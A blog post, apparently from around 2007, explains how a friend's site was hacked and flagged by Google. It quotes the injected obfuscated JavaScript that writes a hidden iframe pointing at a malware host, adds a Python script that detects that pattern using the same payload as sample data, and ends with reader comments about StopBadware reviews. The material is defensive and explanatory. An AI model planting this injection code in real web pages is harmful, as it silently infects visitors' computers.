
Hacked websites, trojan horses, Russian/Panamanian blackhat hackers – just another day at the Berkman Center

About a week ago, I was writing a blog post and wanted to link to a friend’s personal site. I wanted to make sure I got the link right, so I googled her name. I was surprised to discover that Google wouldn’t let me connect directly to her site – instead, under the description of her site was the warning “This site may harm your computer”.

I’d seen the “this site may harm your computer” message before. Several of my colleagues at Berkman are involved with a project and website called Stop Badware. It’s the brainchild of my friend Jonathan Zittrain, who is deeply concerned that the “generativity” of internet-connected PCs might lead to an environment so dangerous that users will switch to less-generative, single purpose Internet devices. (Zittrain’s excellent paper on generativity is here, and I’ve written previously on generativity and Stop Badware here.) Stop Badware maintains a catalog of sites that have been reported to distribute “badware”, which they describe as “…malicious software that tracks your moves online and feeds that information back to shady marketing groups so that they can ambush you with targeted ads. ”

Google identifies sites that they believe are spreading badware and registers them with Stop Badware. My colleagues with Stop Badware have the unenviable task of managing the Google review process – if a site is tagged as spreading badware, the site’s administrator has the option of protesting and having the site reviewed by a team that includes folks at the Berkman Center. This is a very emotional issue for site owners, as having your site de-listed by Google can have very serious consequences for your traffic, your reputation, etc.

So what was my friend’s site doing on Google’s badlist? She doesn’t distribute software of any sort. Clearly some sort of mistake had been made. I wrote a snippy letter to my friends at Berkman, cc’d it to Zittrain and titled the missive, “Not the best day for Stop Badware”.

Of course, I was the one who’d made the mistake. Within half an hour, three of my colleagues pointed me to the source code of my friend’s page. At the top of her index page was a strange-looking piece of Javascript:


<script language="javascript">
document.write( unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E') );
</script>

That’s some seriously obfuscated Javascript. But if you translate from hexadecimal to ASCII, the code’s pretty clear – it inserts the following code into the top of the HTML page:


<iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

The code opens an “iframe”, an inline frame which allows another web page to be embedded within a page – iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.

That page doesn’t load on my browser – the server is apparently refusing connections, at least from my Macintosh – but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you’ll mostly find lots of angry message board posts from spamfighters – the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness-associated webpages are in Russian, though their servers are currently in Panama City, Panama – some antispammers believe that RBusiness is short for “Russian Business Network”, which was evidently their previous operating name.

Googling for the specific IP – 81.95.146.98 – turns up a couple of pages with people documenting an interesting exploit – the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company’s travel policy. (Remarkably, this site is the #1 match for a search for “travel policy” on Google, though Google doesn’t let you click directly to the page, stopping you with a “harm your computer” message.)

It’s possible that this is what my friend’s site was trying to install – Ivan’s report dates from October 2006. It’s also possible that it was trying to install a more recent package of malware – Trojan-PSW.Win32.Small.bs – which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.

So has my friend begun working for Russian/Panamanian black hat hackers? It’s pretty unlikely – she’s just not that sort of gal. So, how’d the code get onto her otherwise innocent website?

Simply put, it was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they’re able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend’s server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.

It’s great that Google is proactively searching for these dangerous bits of code, but it would be much, much better if they were also alerting owners of these compromised sites. When the program began, the logic – as I understand it – was that using site registration information (via whois) and alerting the contacts for a site would probably result in sites being thrown off their servers before they had a chance to appeal the decisions. That might have been a good call when most of the folks getting tagged for spreading malware were knowing distributors of the evil stuff. But in a world where lots of folks are having their sites hacked and are spreading malware unconsciously, it would be a really, really good idea to alert people who’ve been tagged by Google. In this case, both the tech and admin contacts for the site were legit, working email addresses and my friend would have been able to remove the offending code much more quickly than by having me discover it via Google.

How widespread is this new attack? That’s not clear – Stop Badware now has over 45,000 reports on URLs which Google or other partners have identified as distributing badware – my friends within the project report that daily reports of new sites have increased 300% over the past few weeks, suggesting there may be a wave of this sort of server compromise.

If your site is identified as spreading malware by Google and you think you’re experiencing this problem, do the following:

– Use the “view source” function on your browser and look at the source of the indexed pages of your site. If you find an obscured piece of Javascript like the one posted above, then there’s a good chance you’re in the same circumstances as my friend.

– Edit your html pages to remove the offending code.

– Change your password on your hosting account, making sure you’re using a secure password.

– Alert your hosting provider so they can be sure their software is patched and the attackers weren’t exploiting a known software hole.

– Visit the StopBadware site and use the “request a review” form to have them reexamine your site and remove the block. DON’T DO THIS UNTIL YOU’VE REMOVED ANY OFFENDING CODE, or you’re wasting your time and theirs.
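As an added example (not code from this post or from StopBadware), the Python script below automates the first step of the checklist and the hexadecimal-to-ASCII translation shown earlier. It finds `document.write(unescape('...'))` or `eval(unescape('...'))` calls in saved page source, decodes the percent-escaped payload the way JavaScript’s `unescape()` would (handling the `%uXXXX` form as well as the `%XX` form seen in the post, so it goes a little beyond the post’s sample), and reports any `<iframe>` sized to 0 or 1 pixel. The only embedded data is the exact script quoted in the post; the surrounding sample page around it is constructed. The file-extension list and the directory-argument convention are my own assumptions.

```python
import re
import sys
from pathlib import Path

# JavaScript's unescape(): "%XX" is one Latin-1 character, "%uXXXX" one UTF-16 code unit.
UNESCAPE_TOKEN = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

# document.write(unescape('...')) or eval(unescape('...')) with a quoted literal as the payload.
OBFUSCATED_CALL = re.compile(
    r"(?:document\.write|eval)\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)",
    re.IGNORECASE | re.DOTALL,
)

# <iframe ... src=VALUE>; the value may be unquoted and separated from "=" by whitespace.
IFRAME_SRC = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?\s*([^\s\"'>]+)", re.IGNORECASE)

# A width or height of 0 or 1: a frame that is meant not to be seen.
TINY_DIMENSION = re.compile(r"\b(?:width|height)\s*=\s*[\"']?\s*[01]\b", re.IGNORECASE)


def js_unescape(text):
    """Decode a string the way the JavaScript unescape() built-in does."""
    return UNESCAPE_TOKEN.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def scan_html(html):
    """Return one finding per obfuscated write/eval call: the decoded markup, any iframe
    sources it contains, and whether the frame is sized to be invisible."""
    findings = []
    for match in OBFUSCATED_CALL.finditer(html):
        # Injected payloads often arrive wrapped across lines; whitespace is not part of the data.
        payload = re.sub(r"\s+", "", match.group(2))
        decoded = js_unescape(payload)
        iframe_src = IFRAME_SRC.findall(decoded)
        findings.append({
            "decoded": decoded,
            "iframe_src": iframe_src,
            "hidden": bool(iframe_src) and TINY_DIMENSION.search(decoded) is not None,
        })
    return findings


def scan_tree(root):
    """Scan every .html/.htm/.php file below root (assumed extension list);
    returns {path: findings} for files that contain at least one hit."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in {".html", ".htm", ".php"}:
            findings = scan_html(path.read_text(errors="replace"))
            if findings:
                report[str(path)] = findings
    return report


# Constructed sample page: an ordinary index page with the script quoted in the post injected at the top.
SAMPLE_PAGE = """<html><head><title>My photos</title>
<script language="javascript"> document.write( unescape(
'%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E'
) );</script>
</head><body><p>Welcome to my site.</p></body></html>"""

if __name__ == "__main__":
    # With a directory argument, scan a local copy of the site; otherwise run on the sample.
    report = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else {"<sample>": scan_html(SAMPLE_PAGE)}
    for path, findings in report.items():
        for finding in findings:
            label = "HIDDEN IFRAME" if finding["hidden"] else "injected markup"
            print(f"{path}: {label}: {finding['iframe_src'] or finding['decoded'][:80]}")
```

Run it with the path to a local copy of your site to get a list of files carrying this pattern and the address each hidden frame points at. Because the script only recognises the `unescape()` obfuscation, scan the pages as a browser receives them (fetch the rendered HTML rather than only reading files on disk): code injected through a modified template or plugin does not appear in the static files, and a different encoder would need its own decoder added alongside `js_unescape`.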

These sorts of attacks are also reminders for Windows users that you can inadvertently install really nasty software on your machine even if you don’t open email attachments. Please, please keep your Windows installation patched and up to date, and consider using the Firefox browser. Some of these attacks take advantage of specific features in the Internet Explorer browser to allow the hostile code to load on your machine.

There’s a brief interview with Jonathan Zittrain in January’s Wired magazine, where the interviewer (Lucas Graves) is skeptical about JZ’s concerns about malware forcing users off PCs and onto less generative devices. Graves notes, “Things would have to get pretty damn bad to make us abandon our PCs.” JZ mentions that they could, indeed, get really bad. Hacked webservers that install code on unsuspecting users that turns your PC into a zombie for spam relaying and other attacks? Maybe JZ’s more prescient than I thought…

69 thoughts on “Hacked websites, trojan horses, Russian/Panamanian blackhat hackers – just another day at the Berkman Center”

  1. Of course, like real-world viruses, there is strong incentive for this sort of hacking to spread widely but have shallow impact. I’m beginning to suspect that exploits of the sort that hit your friend, which cause illness (non-crippling waste of cpu/bandwidth) rather than a fatality (data loss, theft of credit card #s), will not be sufficient to cause us to hit Z’s tipping point. We may just be happy to cope with this sort of thing.

  2. “happy” isn’t the word I would have used. I’m currently contending with some linkfarmer who’s stolen the entire content of my blog–as far as I can tell– as filler for the farm. I gather search engines these days can parse for mere word salad, so the asshats need something that looks real. The hosting service listed as responsible for the linkfarmer’s domains is being thoroughly useless.

    I’m the opposite of happy to be dealing with this, but, I must admit, you’re right that I haven’t stopped using my computer.

  3. Pingback: Lex Ferenda » Stopping Badware - or stopping Peacefire?

  4. You’re right that happy wasn’t quite the right word; we aren’t happy to get colds or flus either. But we tolerate, cope, and move on, and I don’t think that it is unreasonable to think that we’ll do the same with computer viruses. Hopefully the shift to reasonably well-defined standards as the primary means of data and application transmission (i.e., the web) will give us a little more diversity in the ecosystem, and make the problem even less critical.

    That said, Z may be right despite himself. For reasons of stability and ease of deployment (not security!) people are moving to dumber end-points, either as web terminals driving a generative-ish set of web apps, or as things like AppleTV/TiVO. So his non-generative end-points may happen, but more out of MS’s incompetence and the complexity of attaching interesting hardware to general purpose PCs than out of a security 9-11/Pearl Harbor.

  5. Pingback: Memex 1.1 » Blog Archive » The new malware ecology

  6. Pingback: TCS Innovations » Blog Archive »

  7. Regarding StopBadWare.Org, while I see that your site was indeed hacked and there you did discover the malicious code, this is not always the case. StopBadWare.Org has a noble mission, but they are often incorrect in flagging and delisting sites. They permanently damage the reputation of sites with no malicious or silent programs. Furthermore, StopBadWare.Org will not produce the evidence/scans of the site. Even worse, they do not contact Web Administrators, despite claims to the contrary. StopBadWare.Org needs to rethink their methodology, needs to post “retractions” of incorrect site-flaggings, and needs to provide evidence of the presence of malicious code before delisting. They also need to provide a log of attempts to contact the Web Administrators of these sites. Despite claims to the contrary, they do not contact the site Administrators and many (if not most) of the owners of the 30,000+ sites they have delisted are unaware of their status. Vigilantes too believe their mission to be noble. StopBadWare.Org has been bestowed awesome power to delist sites. Without evidence and due process, however, it amounts to nothing more than slander in situations where they are incorrect.

  8. Pingback: Info/Law » Hackers, Badware, and Google

  9. stopbadware.org has no methodology, or at least not a good methodology, and is just making noise without any good results.
    The bad point is that Google is using them and using the name of some universities and the naive people working there to make noise, but very poorly organized.
    I’m angry about the need to do something, but not in the way that stopbadware.org is acting; that’s not ethical at all.
    Why? Because they don’t know anything about what they are doing.

  10. I received Google’s malware notification email three weeks ago. Then I checked my website carefully and found exactly the same injected code as above. I just removed it without knowing its details (Now I know, thanks for your explanation here.), and then changed my website admin FTP password and requested a review from stopbadware.org. Now, I run SpyBye, McAfee Site Advisor… desperately every day….

    Although Stopbadware replied to me with an auto-email saying that they would get back to me in about 10 business days, I still have not received any reply yet, so I am still waiting hopelessly….

    I got a feeling that Stopbadware & Google currently are putting much higher priority on finding new sites on which they can put a bad tag than on reviewing the sites already in their badlist. This is probably their business strategy. At least, I bought AdWords after being tagged by Google, with a wish to provide a workaround to Google’s search engine. So now, people can still link to my website via Google’s Ad link, although the left side links provided by Google’s search engine are still tagged with “This site may harm your computer”.

    But is putting a bad tag on a website that has already been clean for long legally correct or not? This has badly smashed the reputation of my website, given the fact that I am actually a victim of website hackers.

  11. “I got a feeling that Stopbadware & Google currently are putting much higher priority on finding new sites on which they can put a bad tag than on reviewing the sites already in their badlist. This is probably their business strategy.”

    That’s the real point behind all this.

  12. An update on my story: my website has just been removed from Google’s bad list. It is still in StopBadWare.org’s clearinghouse – not synchronised?

  13. We recently discovered (thanks to a customer letting us know) that our site was flagged. We weren’t notified by Google or StopBadware and this troubles us a great deal.

    At the moment we can only assume we were labeled after a hacking which occurred nearly three months ago where an iframe was placed on our site.

    We’ve been buying AdWords to build up contact with our site and other things and now Google has us ‘black listed’ … to say this could potentially hurt our internet sales is an understatement. Google is such a major player on the internet that we worry our reputation will/has suffered a devastating blow.

    The worst part is, it would appear, we are helpless against this labeling. Isn’t it bad enough that stores like ours have to fight major chain competitors like walmart and target without having to fight tooth and claw just to remain in the internet market as well?

  14. Hi folks,

    I work with StopBadware, and I’d like to clear up some confusion and hopefully address the concerns of some of the commenters here. Thanks, Ethan, for blogging this and helping make more people aware of badware.

    To reply to GoogBadnUgly and Son, it’s important to recognize the distinction between what Google does, and what StopBadware does. StopBadware is not the organization flagging sites; that’s Google. More information about Google’s warnings, and StopBadware’s relationship as the organization helping webmasters get their sites unflagged once they are clean, is available here: http://stopbadware.org/home/faq#partnerwarnings

    Google is also the organization making a good faith effort to notify webmasters when their sites have been flagged. As Ethan notes, Google does not at present email to WhoIs contact emails, but they do email webmaster aliases and more. Google has more information about their notifications here: http://googlewebmastercentral.blogspot.com/2007/02/better-badware-notifications-for.html

    If you know of a site that you believe was flagged by Google in error as a “false positive,” please let us know, and we’d be happy to investigate. (Please check the site’s source code for badware that may have been inserted through a hack first – see our Security Tips page, linked below, for info.)

    In reply to David, we don’t have a business strategy, as we are a nonprofit. Our core goal is to help preserve the innovative character of the internet by helping all internet users find ways to be safe online without compromising the net’s characteristic freedom. While I can’t speak for Google, as a search engine, Google has a reasonable interest in not directing searchers to sites that may harm them.

    Regarding the time it can take to process some reviews, StopBadware development staff spent the month of March intensely focused on improving the review process. Since early March, we have been able to provide a quick turnaround for sites that are fully clean of badware before seeking a review. For sites that request review while still infected, the process can be longer, though our turnaround times continue to speed up as we further automate our processes. You can read more about our improvement efforts here: http://groups.google.com/group/stopbadware/browse_thread/thread/3b3765992bbfbe39

    Lastly, to DeAnna, we are definitely sympathetic to the fact that, undeniably, websites that have been hacked have been victimized. Google implements the search warnings to minimize the victimization by helping its searchers avoid being infected themselves. While being flagged with a warning is certainly frustrating, sites are by no means helpless. StopBadware provides a review for any website owner who requests it. We also provide other resources for site owners, including a discussion community.

    The Request for Review form is here: http://stopbadware.org/home/review

    We have a helpful Security Tips page here: http://stopbadware.org/home/security

    Our discussion group is here: http://groups.google.com/group/stopbadware

    Erica George
    StopBadware Online Organizer

  15. How can I have the Harmful warning removed from my website that is clean? This warning has been on my site for over 20 days and I’ve contacted stopbadware.org 3x with no response.

    Thanks
    victoria

  16. Well, one thing that also gets concerning is when someone moves to a new host, wipes out the forum (on the basis that’s probably the part where exploits might be used) but doesn’t actually get any feedback after requesting a review, so doesn’t know

    a) if someone is even seeing the review requests
    b) if there is still code which is deemed ‘harmful’

    I’ve been looking at pages for a friend’s site http://www.bwpics.co.uk which has been listed – I helped him set up the forum, the only section of HTML/code he didn’t write on his Mac. I don’t know how many days ago he requested a review, but he’s worried as he’s already having a hard time (he’s a photographer, and does photo renovation for people, but with this Google warning, expects many who might see his domain name and avoid it now, and in future, because of the ‘kiss of death’ that has been put out via Google).

    Personally, I don’t touch Google, but in the UK, it appears 75% of site visitors come from that particular search engine, more than in most any other country (I use MetaCrawler.com, and have done for years).

  17. Pingback: badware « gbiondo

  18. Pingback: Sid Hale » Blog Archive » Does Google Report your Site as Malicious?

  19. Hi,

    I’m the webmaster of turksohbet.net

    There isn’t any harmful result at my site. 10 days ago I saved my site to a toplist. Then my site had some bug. But when I saw this, I cleaned that toplist from my site. But now my site seems a harmful site in Google results. Can you help me?

    Regards,

    Nami Karaca

  20. I run a network of websites and one was compromised in exactly this manner recently.

    I have received the notice from Google and StopBadWare.
    Now I am slowly deleting all that malicious code snippets – my website is really big and I am working on this issue for the 2nd week now.

  21. Pingback: …My heart’s in Accra » Over 10,000 malware sites hosted by IPowerWeb

  22. I’m the web admin and programmer at my company. Yesterday we noticed that our main page at http://www.neo-shop.com had been hacked by this (around April 24th). We quickly removed the code and changed all the passwords.
    Today, our Windows 2003 server was ready to install some security patches. I suppose it’s related.

    Does anyone know how they manage to break our security?

  23. All browsers should have a fortress module that keeps up with the latest online scams, like an always on virus scan-type program.

    If the browsers did this users can surf with more ease as their browsing is monitored for problems and alerts them to make a decision.

    If the problems are coming while browsing, then the browsers should have a module that is attached, always on, and alerts of the latest scam while browsing the net.

    The browser could scan each page before allowing the surfer to view. It shouldn’t be too much of a performance knock these days, especially for legit sites because the pages will quickly scan, they’d have known/legit content types. If hacked, then that is quickly found out and user is warned and can send a note to the owner and some reporting agency(even automatically).

    Basically you take the concept of the always on virus scan and put it in the browser targeting web surfing problems.

    The fortress gets updated as soon as the latest exploit is discovered, similar to always on virus scan services.

  24. halocollection.com home page has the same IFrame, and tries to download something from an IP that belongs to LUGLINK from Russia

    this is the first line of code there

  25. to Monique:

    That kind of website-checking module may already exist… try the McAfee SiteAdvisor plugin (siteadvisor.com) which can alert you to potentially nasty sites and rates each with red, yellow or green labels to indicate danger and relative safety. Someone briefly mentioned it earlier in the thread, but it deserves a couple of paragraphs.

    Personally recommend FireFox+plugin as the Windows IE version seemed determined to run as a system service on my last try, which seemed a little excessive since I don’t browse the net 100% of the time my computer is on. Besides, you probably ought to be using the Fox anyway.

    Grit your teeth slightly as you click agreement to the licence; your browsing movements are sent to McAfee, albeit anonymously and for purposes of good.

    There may be other browser plugins that perform similar functions using other black and whitelists, too.

  26. How can I have the Harmful warning removed from my website that is clean? This warning has been on my site for over 20 days and I’ve contacted stopbadware.org 3x with no response

  27. Hi,

    I’m the webmaster of turksohbet.net

    There isn’t any harmful result at my site. 10 days ago I saved my site to a toplist. Then my site had some bug. But when I saw this, I cleaned that toplist from my site. But now my site seems a harmful site in Google results. Can you help me?

    Regards,

  28. to Monique:

    That kind of website-checking module may already exist… try the McAfee SiteAdvisor plugin (siteadvisor.com) which can alert you to potentially nasty sites and rates each with red, yellow or green labels to indicate danger and relative safety. Someone briefly mentioned it earlier in the thread, but it deserves a couple of paragraphs.

    Personally recommend FireFox+plugin as the Windows IE version seemed determined to run as a system service on my last try, which seemed a little excessive since I don’t browse the net 100% of the time my computer is on. Besides, you probably ought to be using the Fox anyway.

    Grit your teeth slightly as you click agreement to the licence; your browsing movements are sent to McAfee, albeit anonymously and for purposes of good.

    There may be other browser plugins that perform similar functions using other black and whitelists, too.


  29. Hi,

    I’m the webmaster of turksohbet.net

    There isn’t any harmful result at my site. 10 days ago I saved my site to a toplist. Then my site had some bug. But when I saw this, I cleaned that toplist from my site. But now my site seems a harmful site in Google results. Can you help me?

    Regards,

    Nami Karaca

  30. Pingback: Unintentionally distributed badware “may harm your computer” at Elliot Lee

  31. How to protect against this trojan virus in FreeBSD/Linux? Please let me know how to trace these trojans, I mean any tools.

  32. Pingback: …My heart’s in Accra » Trends in Badware

  33. Well I got one solution for you, system followers: increase the rate for internet access, for instance 10 bucks for an hour of iNet access, that way I can get anything that I like…

  34. Pingback: The Back Burner » The good, the bad and the ugly

  35. There isn’t any harmful result at my site. 10 days ago I saved my site to a toplist. Then my site had some bug. But when I saw this, I cleaned that toplist from my site. But now my site seems a harmful site in Google results.

  36. I worked hard on my web site for a year, then finally got it up and running at ixwebhosting.com. I got busy with other stuff and didn’t give my web site much attention for a few months, and now I find myself the victim of a trojan virus such as Mr. Zuckerman talks about. I have run virus scans on the Mac I use for web design and caught nothing. I copied the files to a CD and tested them on my PC. Nothing was found using Norton or Kaspersky. When I uploaded the html code from my home computer to my server, the problem would be okay for a while and then it would get reinfected. What I have repeatedly asked the help desk over there is how my files are getting reinfected since things are clean at home? They have just as repeatedly said the problem is on my end. When I ask directly, they do not tell me how they protect their clients from malware. Meanwhile, I am blacklisted on Google for this. I continue to monitor my sites daily. Is there a way for a hacker to sneak some coding in that ties to the link and is not in the original code? Are there antivirus programs that can be uploaded to a server? Is there secure code that a webmaster can use to deflect these nasty trojans? Does anybody know what else I can do to make my site more secure? I have changed the passwords, and will continue to do so frequently. Meanwhile I have to monitor this site to make sure it doesn’t get reinfected, then I have to do all the work to try to rebuild my site’s reputation. I am not a deliberate spreader of malware, and it is very unjust that such hackers exist. If anyone can direct me to solutions that will help me to learn to avoid these problems in the future, I will be much happier.

  37. Hello
    There isn’t any harmful result at my site. 10 days ago I saved my site to a toplist. Then my site had some bug. But when I saw this, I cleaned that toplist from my site. But now my site seems a harmful site in Google results. Can you help me?

  38. Hello. I have received the notice from Google and StopBadWare.
    Now I am slowly deleting all that malicious code snippets – my website is really big and I am working on this issue for the 2nd week now.

  39. Thanks for the wonderful article.

    I followed your suggestions and found at the bottom of my index page almost the same JavaScript you mentioned.

    Now I am waiting for Google to remove the warning.

  40. What about blogs (mine is WordPress) that get the huge long javascript code inserted, but you can’t see the code at all under admin, but in view source only?
    The script displays ads and porn ads…. this also happened on another page that is outside the blog, but connected. Had to rename the page, but the code does not show when you open it in text or Dreamweaver…

  41. Lauren, the code is being inserted from your WordPress blog – the hackers have changed your template to insert the javascript. You’ll need to talk to your hosting company and clean up your WordPress installation. This is a pretty common problem with WordPress – if it’s not kept very up to date, hackers can find ways to break in and insert code into your templates.
